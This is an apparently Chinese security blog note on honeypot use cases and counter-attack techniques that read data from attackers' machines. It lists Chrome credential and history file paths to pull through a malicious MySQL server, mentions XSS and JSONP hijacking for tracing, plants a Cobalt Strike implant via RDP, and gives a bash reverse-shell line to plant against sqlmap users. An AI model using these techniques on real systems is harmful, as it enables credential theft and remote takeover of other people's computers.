0x01 业务场景

1.内网失陷报警

用来捕捉内网已经失陷、勒索软件和恶意行为。对突破进内网的恶意流量进行感知告警，精准发现内网失陷主机。
诱导攻击者攻击蜜罐，加大攻击者时间成本，为应急响应增添时间，从而减少核心业务损失。

2.溯源反制

反制日常中违法犯罪的攻击者
反制攻防演练的红队成员并得分

3.员工账号密码资产遗失感知场景

企业可将常见的对外服务例如vpn.company.com或hr.company.com 替换成蜜罐，通过监控试图登录的账号判断是否为内部员工账号，并实时通知安全团队和该员工，敦促其尽快修改密码。

0x02 常见反制溯源蜜罐

MySQL（连接）
深信服vpn（exe运行）
web页面蜜罐
- Jenkins蜜罐
- Confluence系统蜜罐
- Jira系统蜜罐
- 通达OA蜜罐
- GitLab蜜罐
  ...

0x03 蜜罐反制溯源原理

1.mysql

mysql有一个功能是可以读取本地的文件存储到数据库中，该函数是“local data”、“local infile”。mysql蜜罐获取个人敏感信息也是通过这种特性完成的。
mysql客户端向Server发起查询后，Server会返回一个Response TABULAR的响应包。而如果在这个数据包中指定文件路径，就可以读取Client相应的文件。实际上Server可以在回复任何Client端的请求时返回Response TABULAR响应包，而不仅仅是在Client发起Load data local infile后。

根据mysql的这种机制，当攻击者访问mysql蜜罐时，我们可以发送一个包含文件路径的响应包去读取客户端的文件。

利用

读取微信号
- C:/Windows/PFRO.log获取windows用户名
- C:/Users/用户名/Documents/WeChat Files路径下获得微信号甚至是手机号—但每个版本的微信路径不同。
读取chrome的登录数据C:\Users\yyds\AppData\Local\Google\Chrome\User Data\Default\Login Data
chrome的历史纪录C:\Users\yyds\AppData\Local\Google\Chrome\User Data\Default\History

2.web页面蜜罐

利用大量三方网站的cookie进行个人信息追踪，例如各种购物网站广告匹配机制，分析你各种喜好，推送符合你的广告，我们调用这些接口就可以获得很多意想不到的信息，例如目标年龄段、性别、体型、个人喜好等信息（各大广告公司一直在做，例如百度联盟、谷歌广告），或者干脆直接调用各大网站的登录接口，获取一些callback的用户登陆账号信息。
主要使用技术

JSONP劫持
XSS
Webrtc获取IP地址

0x04 补充

不常见反制

1.RDP反制

攻击者需要在连接RDP时自己开启磁盘共享
流程
蜜罐上放上CS马，攻击者RDP连上蜜罐后，不停将复制粘贴的进程rdpclip.exe kill掉后，攻击者搜索文章后，可能会自行开启该设置从而被拿下整个C盘的内容。无法攻击mac，RDP可能会崩溃
参考：
https://mp.weixin.qq.com/s/JWUCj7KepHMsy2Q-MiGO7A
https://mp.weixin.qq.com/s/ZZRTxfpxtODisNnjRXmNCg

2.SQLMAP反制

利用Linux特性，反引号内的命令会执行
编一个像sql注入的页面，然后将

bash -i >&/dev/tcp/192.168.xxx.xxx/2333 0>&1

写入到默认的值上面，或者cookie等一些容易忽视的地方。等待攻击者将burp请求，直接复制到文件中，然后直接使用sqlmap，导致直接执行命令，达到反制。局限是在linux上，且要攻击者安全意识差。
https://mp.weixin.qq.com/s/RUM_f9OkmJfdorKxJIBPuQ